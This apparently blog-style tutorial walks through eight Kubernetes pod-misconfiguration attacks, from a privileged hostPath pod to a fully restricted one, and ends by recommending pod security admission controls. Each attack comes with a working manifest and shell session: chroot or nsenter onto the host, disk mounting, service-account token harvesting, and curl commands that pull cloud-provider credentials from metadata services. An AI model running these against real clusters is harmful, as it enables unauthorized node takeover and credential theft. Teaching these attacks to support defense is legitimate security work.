Let's look at some common and simple ways for privilege escalation using K8s pods. Almost all of these vulnerabilities can be patched using pod security policies.
Prerequisites
- Access to a K8s cluster
- Permissions to create a pod and exec into it
- No
Pod Security Policies
enforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like gatekeeper
Back to Basics
As you might know, pods are nothing but a group of linux processes that are executed using two features of the Linux kernel called: namespaces and cgroups. While namespaces(HostName
, PID
, File System
, Network
, IPC
) allow us to provide a "view" to the process that hides everything outside of those namespaces, the cgroup limits the resources(cpu, ram, block and network I/O) that the process can use.
Let's get started
K8s generally uses RBAC for authorization. Even in the cases where a user is not allowed to create a pod, there are at least seven other ways for them to create a pod, using the built-in controllers like: Job
, CronJob
, ReplicationController (it's not very common now-a-days), ReplicaSet
, Deployment
, DaemonSet
and StatefulSet
along with countless number of custom-controllers. So, if you are looking for ways to prevent your users from creating pods - look out for all of these different ways your cluster provides for creating them.
For our case, let's assume we have rights to create pod
resources and to exec
them.
Modes
- privileged - A
privileged
container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use linux capabilities like manipulating the network stack and accessing devices. hostPID
hostNetwork
hostIPC
hostPath
Attack 1 (Everything Allowed)
You can exec
into the pod and mount the host's root filesystem and chroot
to it, effectively becoming root
on the host running your pod
. If it's a control-plane node, you can access secrets directly from the etcd
or use credentials of other privileged control plane components.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed
image: ubuntu
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
EOF
kubectl exec -it everything-allowed -- bash
root@minikube:/ docker ps
bash: docker: command not found
root@minikube:/ chroot host
sh-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f3d3252343be ubuntu "/bin/sh -c -- 'whil…" 2 minutes ago Up 2 minutes k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0
Attack 2 (Privileged and HostPID)
privileged
breaks down most of the walls that container security provides and with hostPID
they can see and enter the namespace of any process running on the host.
How
Let's nsenter
to init
process's namespace (from there onwards we'll have same access as with Attack 1 (Everything Allowed)
)
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid
spec:
hostPID: true
containers:
- name: priv-and-hostpid
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF
kubectl exec -it priv-and-hostpid -- bash
bash-5.0 docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c050527a7218 ubuntu "nsenter --target 1 …" 3 minutes ago Up 3 minutes k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0 cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
anonymous:
enabled: false
webhook:
cacheTTL: 0s
enabled: true
x509:
clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . .
Attack 3 (Privilege Only)
Like the first attack, in privileged mode access to node's devices is granted which includes the /dev
filesystem. This filesystem can be mounted on the pod (this won't give a full view of filesystem as in Attack 1
though)
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: priv-pod
spec:
containers:
- name: priv-pod
image: ubuntu
securityContext:
privileged: true
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 7345880 638328 6707552 9% /
. . . . . . . . .
tmpfs 4081044 8 4081036 1% /tmp
/dev/vda1 136554284 37411016 91262620 30% /mnt/vda1
. . . . . . . .
kubectl exec -it priv-pod -- bash
root@priv-pod:/ mkdir /tmp/host-fs
root@priv-pod:/ mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/ cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs ls
data hostpath-provisioner hostpath_pv lost+found var
root@priv-pod:/tmp/host-fs ls var/lib/docker/ # also var/lib/kubelet
buildkit containerd containers image network overlay2 plugins runtimes swarm tmp trust volumes
Attack 4 (HostPath Only)
If the administrators have not limited what you can mount, you can mount /
on the host into your pod, giving you read/write access on the host’s filesystem.
- You can search for
kubeconfig
file and might get cluster-admin config file - Can search for tokens in
/var/lib/kubelet/pods/
- look for tokens that might give access to secrets inkube-system
or maybe havecluster-admin
role - Can add your SSH key to the host
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpath-pod
spec:
containers:
- name: hostpath
image: ubuntu
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
EOF
kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/ cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root 140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root 100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 22 04:31 token -> ..data/token
Attack 5 (HostPID only)
With only hostPID, you can
- View processes on the host – running
ps
within the pod would list all the processes running on the host (including processes on other pods) - View the environment variables for each pod on the host(process UIDs should match) - can read the
/proc/[PID]/environ
file for each process running on the host. - View the file descriptors for each pod on the host - can read the
/proc/[PID]/fd[X]
for each process running on the host. - Kill processes – can also kill any process on the node (presenting a denial-of-service risk)
You might get lucky and find secrets, token etc in output of ps
or in env vars.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpid-pod
spec:
hostPID: true
containers:
- name: hostpid-pod
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/ ps aux
. . . <removed for brevity> . . .
root 5828 0.0 0.1 710940 8512 ? Sl 03:34 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root 5849 0.3 0.4 747660 38376 ? Ssl 03:34 0:31 /coredns -conf /etc/coredns/Corefile
root 3348 1.5 0.9 10612728 74544 ? Ssl 03:33 2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .
root@hostpid-pod:/ cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/root
You can only get environ
for processes which share the same UID
as our pod. To read env file of a process with different UID(987
let' say), run the pod with runAsUser
specified to be that UID.
Attack 6 (HostNetwork only)
With only HostNetwork
set to true
, you can't get privileged code execution on the host directly. But, there are still some things you can look for
- Traffic sniffing - You can sniff traffic using tools like
tcpdump
and might some secrets/tokens being sent over unencrypted. - Access services bound to localhost - You can access services listening only on
loopback
address. - Bypass network policy - If you set
hostnetwork=true
, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostnetwork-pod
spec:
hostNetwork: true
containers:
- name: hostnetwork
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
Attack 7 (HostIPC only)
Nothing much that can be done here. You'll be able to read/write to same files/mechanisms that other processes use for IPC (ex: /dev/shm
). You should check out the other IPC mechanisms with ipcs
and see if anything is written there.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostipc-pod
spec:
hostIPC: true
containers:
- name: hostipc
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt
kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/ cat /dev/shm/secretpassword.txt
secretpassword=usethissecret
root@hostipc-pod:/ ipcs -a
------ Message Queues --------
key msqid owner perms used-bytes messages
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
------ Semaphore Arrays --------
key semid owner perms nsems
Attack 8 (Nothing Allowed)
- If nodes are part of cloud env, you can check for
metadata
service (you might find creds for cloud provider)
# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/
# Azure
curl -H Metadata:true "http://169.254.169.254/metadata/instance
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token
- Overly permissive service account: By default the
default
SA of a namespace is mounted to a pod. If that SA is overly permissive, you can use that to further escalate your permissions in the cluster.
Conclusion
I just wanted to show how easy it is to gain unauthorized access to the underlying nodes or the cluster-itself in the absence of proper security checks.
All of the above attacks (except in Attack 8
) can be mitigated by using PodSecurityPolicies. As of K8s 1.21, PodSecurityPolicy is deprecated and instead PodSecurityAdmisson (as of K8s 1.23 they are in beta
state) controllers should be used.